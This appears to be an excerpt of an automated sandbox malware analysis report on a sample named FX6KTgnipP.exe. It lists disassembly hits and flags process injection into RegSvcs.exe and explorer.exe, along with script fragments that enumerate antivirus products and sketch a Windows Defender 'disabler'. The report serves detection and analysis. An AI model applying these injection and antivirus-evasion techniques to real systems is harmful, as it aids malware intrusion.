                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F29F9 mov eax, dword ptr fs:[00000030h]14_2_019F29F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8A9D3 mov eax, dword ptr fs:[00000030h]14_2_01A8A9D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019B8918 mov eax, dword ptr fs:[00000030h]14_2_019B8918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019B8918 mov eax, dword ptr fs:[00000030h]14_2_019B8918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4892A mov eax, dword ptr fs:[00000030h]14_2_01A4892A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A5892B mov eax, dword ptr fs:[00000030h]14_2_01A5892B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3E908 mov eax, dword ptr fs:[00000030h]14_2_01A3E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3E908 mov eax, dword ptr fs:[00000030h]14_2_01A3E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4C912 mov eax, dword ptr fs:[00000030h]14_2_01A4C912
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A0096E mov eax, dword ptr fs:[00000030h]14_2_01A0096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A0096E mov edx, dword ptr fs:[00000030h]14_2_01A0096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A0096E mov eax, dword ptr fs:[00000030h]14_2_01A0096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4C97C mov eax, dword ptr fs:[00000030h]14_2_01A4C97C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A64978 mov eax, dword ptr fs:[00000030h]14_2_01A64978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A64978 mov eax, dword ptr fs:[00000030h]14_2_01A64978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A40946 mov eax, dword ptr fs:[00000030h]14_2_01A40946
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A94940 mov eax, dword ptr fs:[00000030h]14_2_01A94940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E6962 mov eax, dword ptr fs:[00000030h]14_2_019E6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E6962 mov eax, dword ptr fs:[00000030h]14_2_019E6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E6962 mov eax, dword ptr fs:[00000030h]14_2_019E6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C0887 mov eax, dword ptr fs:[00000030h]14_2_019C0887
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4C89D mov eax, dword ptr fs:[00000030h]14_2_01A4C89D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8A8E4 mov eax, dword ptr fs:[00000030h]14_2_01A8A8E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EE8C0 mov eax, dword ptr fs:[00000030h]14_2_019EE8C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FC8F9 mov eax, dword ptr fs:[00000030h]14_2_019FC8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FC8F9 mov eax, dword ptr fs:[00000030h]14_2_019FC8F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A908C0 mov eax, dword ptr fs:[00000030h]14_2_01A908C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6483A mov eax, dword ptr fs:[00000030h]14_2_01A6483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6483A mov eax, dword ptr fs:[00000030h]14_2_01A6483A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E2835 mov eax, dword ptr fs:[00000030h]14_2_019E2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E2835 mov eax, dword ptr fs:[00000030h]14_2_019E2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E2835 mov eax, dword ptr fs:[00000030h]14_2_019E2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E2835 mov ecx, dword ptr fs:[00000030h]14_2_019E2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E2835 mov eax, dword ptr fs:[00000030h]14_2_019E2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E2835 mov eax, dword ptr fs:[00000030h]14_2_019E2835
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FA830 mov eax, dword ptr fs:[00000030h]14_2_019FA830
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4C810 mov eax, dword ptr fs:[00000030h]14_2_01A4C810
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C4859 mov eax, dword ptr fs:[00000030h]14_2_019C4859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C4859 mov eax, dword ptr fs:[00000030h]14_2_019C4859
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F0854 mov eax, dword ptr fs:[00000030h]14_2_019F0854
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A56870 mov eax, dword ptr fs:[00000030h]14_2_01A56870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A56870 mov eax, dword ptr fs:[00000030h]14_2_01A56870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4E872 mov eax, dword ptr fs:[00000030h]14_2_01A4E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4E872 mov eax, dword ptr fs:[00000030h]14_2_01A4E872
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D2840 mov ecx, dword ptr fs:[00000030h]14_2_019D2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A74BB0 mov eax, dword ptr fs:[00000030h]14_2_01A74BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A74BB0 mov eax, dword ptr fs:[00000030h]14_2_01A74BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0BBE mov eax, dword ptr fs:[00000030h]14_2_019D0BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0BBE mov eax, dword ptr fs:[00000030h]14_2_019D0BBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C0BCD mov eax, dword ptr fs:[00000030h]14_2_019C0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C0BCD mov eax, dword ptr fs:[00000030h]14_2_019C0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C0BCD mov eax, dword ptr fs:[00000030h]14_2_019C0BCD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4CBF0 mov eax, dword ptr fs:[00000030h]14_2_01A4CBF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E0BCB mov eax, dword ptr fs:[00000030h]14_2_019E0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E0BCB mov eax, dword ptr fs:[00000030h]14_2_019E0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E0BCB mov eax, dword ptr fs:[00000030h]14_2_019E0BCB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EEBFC mov eax, dword ptr fs:[00000030h]14_2_019EEBFC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C8BF0 mov eax, dword ptr fs:[00000030h]14_2_019C8BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C8BF0 mov eax, dword ptr fs:[00000030h]14_2_019C8BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C8BF0 mov eax, dword ptr fs:[00000030h]14_2_019C8BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6EBD0 mov eax, dword ptr fs:[00000030h]14_2_01A6EBD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A88B28 mov eax, dword ptr fs:[00000030h]14_2_01A88B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A88B28 mov eax, dword ptr fs:[00000030h]14_2_01A88B28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A94B00 mov eax, dword ptr fs:[00000030h]14_2_01A94B00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3EB1D mov eax, dword ptr fs:[00000030h]14_2_01A3EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3EB1D mov eax, dword ptr fs:[00000030h]14_2_01A3EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3EB1D mov eax, dword ptr fs:[00000030h]14_2_01A3EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3EB1D mov eax, dword ptr fs:[00000030h]14_2_01A3EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3EB1D mov eax, dword ptr fs:[00000030h]14_2_01A3EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3EB1D mov eax, dword ptr fs:[00000030h]14_2_01A3EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3EB1D mov eax, dword ptr fs:[00000030h]14_2_01A3EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3EB1D mov eax, dword ptr fs:[00000030h]14_2_01A3EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3EB1D mov eax, dword ptr fs:[00000030h]14_2_01A3EB1D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EEB20 mov eax, dword ptr fs:[00000030h]14_2_019EEB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EEB20 mov eax, dword ptr fs:[00000030h]14_2_019EEB20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019B8B50 mov eax, dword ptr fs:[00000030h]14_2_019B8B50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A68B42 mov eax, dword ptr fs:[00000030h]14_2_01A68B42
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A56B40 mov eax, dword ptr fs:[00000030h]14_2_01A56B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A56B40 mov eax, dword ptr fs:[00000030h]14_2_01A56B40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019BCB7E mov eax, dword ptr fs:[00000030h]14_2_019BCB7E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8AB40 mov eax, dword ptr fs:[00000030h]14_2_01A8AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A74B4B mov eax, dword ptr fs:[00000030h]14_2_01A74B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A74B4B mov eax, dword ptr fs:[00000030h]14_2_01A74B4B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6EB50 mov eax, dword ptr fs:[00000030h]14_2_01A6EB50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A92B57 mov eax, dword ptr fs:[00000030h]14_2_01A92B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A92B57 mov eax, dword ptr fs:[00000030h]14_2_01A92B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A92B57 mov eax, dword ptr fs:[00000030h]14_2_01A92B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A92B57 mov eax, dword ptr fs:[00000030h]14_2_01A92B57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A16AA4 mov eax, dword ptr fs:[00000030h]14_2_01A16AA4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F8A90 mov edx, dword ptr fs:[00000030h]14_2_019F8A90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CEA80 mov eax, dword ptr fs:[00000030h]14_2_019CEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CEA80 mov eax, dword ptr fs:[00000030h]14_2_019CEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CEA80 mov eax, dword ptr fs:[00000030h]14_2_019CEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CEA80 mov eax, dword ptr fs:[00000030h]14_2_019CEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CEA80 mov eax, dword ptr fs:[00000030h]14_2_019CEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CEA80 mov eax, dword ptr fs:[00000030h]14_2_019CEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CEA80 mov eax, dword ptr fs:[00000030h]14_2_019CEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CEA80 mov eax, dword ptr fs:[00000030h]14_2_019CEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CEA80 mov eax, dword ptr fs:[00000030h]14_2_019CEA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A94A80 mov eax, dword ptr fs:[00000030h]14_2_01A94A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C8AA0 mov eax, dword ptr fs:[00000030h]14_2_019C8AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C8AA0 mov eax, dword ptr fs:[00000030h]14_2_019C8AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C0AD0 mov eax, dword ptr fs:[00000030h]14_2_019C0AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F4AD0 mov eax, dword ptr fs:[00000030h]14_2_019F4AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F4AD0 mov eax, dword ptr fs:[00000030h]14_2_019F4AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A16ACC mov eax, dword ptr fs:[00000030h]14_2_01A16ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A16ACC mov eax, dword ptr fs:[00000030h]14_2_01A16ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A16ACC mov eax, dword ptr fs:[00000030h]14_2_01A16ACC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FAAEE mov eax, dword ptr fs:[00000030h]14_2_019FAAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FAAEE mov eax, dword ptr fs:[00000030h]14_2_019FAAEE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FCA38 mov eax, dword ptr fs:[00000030h]14_2_019FCA38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E4A35 mov eax, dword ptr fs:[00000030h]14_2_019E4A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E4A35 mov eax, dword ptr fs:[00000030h]14_2_019E4A35
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EEA2E mov eax, dword ptr fs:[00000030h]14_2_019EEA2E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4CA11 mov eax, dword ptr fs:[00000030h]14_2_01A4CA11
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FCA24 mov eax, dword ptr fs:[00000030h]14_2_019FCA24
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0A5B mov eax, dword ptr fs:[00000030h]14_2_019D0A5B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0A5B mov eax, dword ptr fs:[00000030h]14_2_019D0A5B
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_00272CE0 GetProcessHeap,0_2_00272CE0
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_00266878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00266878
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_00266A0B SetUnhandledExceptionFilter,0_2_00266A0B
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_0026AAC4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0026AAC4
                Source: C:\Users\user\Desktop\FX6KTgnipP.exeCode function: 0_2_00265BBF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00265BBF
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008829B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_008829B2
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_00870BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00870BCF
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_00870D65 SetUnhandledExceptionFilter,7_2_00870D65
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_00870FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00870FB1
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_003629B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_003629B2
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_00350BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00350BCF
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_00350D65 SetUnhandledExceptionFilter,15_2_00350D65
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_2_00350FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00350FB1

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Allocates memory in foreign processes
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                Contains functionality to inject code into remote processes
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeCode function: 15_3_01853001 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,15_3_01853001
                Injects a PE file into a foreign processes
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\UserAccountControlSettings.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\UserAccountControlSettings.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read write
                Writes to foreign memory regions
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 10DB008Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: A69008Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 237008Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: B15008Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_008B1A91 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,7_2_008B1A91
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2Code function: 7_2_00853312 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,7_2_00853312
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")memstr_59919c61-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: for $objantivirusproduct in $colitemsmemstr_b0eb7b5c-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $usb = $objantivirusproduct.displaynamememstr_82cc1bc0-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: nextmemstr_8d80b456-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return $usbmemstr_ae3d1303-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc ;==>antivirusmemstr_b6fb614e-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func disabler()memstr_d6da425d-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;if antivirus() = "windows defender" thenmemstr_56ca25d1-1
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;#requireadminmemstr_707e17d1-3
